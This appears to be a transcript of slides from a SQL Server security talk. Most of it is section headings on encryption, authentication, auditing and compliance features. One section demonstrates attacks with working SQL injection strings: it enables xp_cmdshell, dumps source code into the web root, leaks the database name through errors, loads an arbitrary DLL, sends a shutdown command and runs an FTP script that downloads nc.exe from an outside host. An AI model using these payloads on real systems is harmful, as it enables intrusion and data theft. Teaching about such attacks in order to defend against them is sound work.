sql server security by clement arul
TRANSCRIPT
SQL SERVER SECURITYClement ArulCTO Mega Fortris
AGENDA
Im a . . .
BUSINESS CHALLENGES
BUSINESS NEEDS
DB VULNERABILITIES
SQL SERVER 2005 SECURITY Recap
SQL SERVER 2005 SECURITY Recap
SQL SERVER 2008 SECURITY
Extensible Key Management (EKM)
Extensible Key Management (EKM)
Transparent Data Encryption (TDE)
Advantages of using TDE
CONTROL ACCESS
Authentication Enhancements
Authentication Features
ENSURE COMPLIANCE
Policy-Based Management
Reduced Surface Area Configuration
SQL SERVER AUDIT
SQL SERVER AUDIT
How Hackers do it ?
SQL INJECTION BASIC TRICKS
Extended Stored Procedures
Enabling xp_cmdshell in SQL Server 2005 / 2008 / R2EXEC sp_configure 'show advanced options',1 RECONFIGURE EXEC sp_configure 'xp_cmdshell',1 RECONFIGURE
Note : By default xp_cmdshell and couple of other potentially dangerous stored procedures are disabled in SQL Server 2005 / 2008 / R2. [If you have admin access, you can enable them]
Example 1 :
To execute a shell command that writes the output of the command dir c:\inetpub in a browseable file, assuming that the web server and the DB server reside on the same host : exec master.dbo.xp_cmdshell 'dir c:\inetpub > c:\inetpub\wwwroot\test.txt'-Alternatively, we can use sp_makewebtask: exec sp_makewebtask 'C:\Inetpub\wwwroot\test.txt', 'select * from master.dbo.sysobjects'--
Example 2 : The SQL Server built-in function db_name() can be used to trigger an error that will return the name of the database: /controlboard.asp?boardID=2&itemnum=1%20AND%201=CONVERT(int,%20db_ name()) Example 3 : Obtaining the application's source code a' ; master.dbo.xp_cmdshell ' copy c:\inetpub\wwwroot\login.aspx c:\inetpub\wwwroot\login.txt';--
Example 4 : Add new procedure (virtually you can execute whatever you want)
sp_addextendedproc xp_webserver, c:\temp\x.dll exec xp_webserver
Example 5 : Start and stop Windows Services. xp_servicecontrol (START or STOP)
Example 6 : Upload Executables Once xp_cmdshell is enabled, uploading becomes a CAT walk.[If the target allows FTP connections, inject the following queries]:
exec master..xp_cmdshell 'echo open ftp.tester.org > ftpscript.txt';-exec master..xp_cmdshell 'echo USER >> ftpscript.txt';-exec master..xp_cmdshell 'echo PASS >> ftpscript.txt';-exec master..xp_cmdshell 'echo bin >> ftpscript.txt';-exec master..xp_cmdshell 'echo get nc.exe >> ftpscript.txt';-exec master..xp_cmdshell 'echo quit >> ftpscript.txt';-exec master..xp_cmdshell 'ftp -s:ftpscript.txt';--
Tools =
Windows : Bobcat , Unix : Sqlninja
';shutdown -
Q&A
References Microsoft Security Development Lifecyclehttp://www.microsoft.com/sdl
Security Configuration Benchmark for SQL Server 2005 & 2008 & R2http://cisecurity.org/
The Open Web Application Security Project (OWASP)http://www.owasp.org
[email protected] http://www.innov8orz.com/blog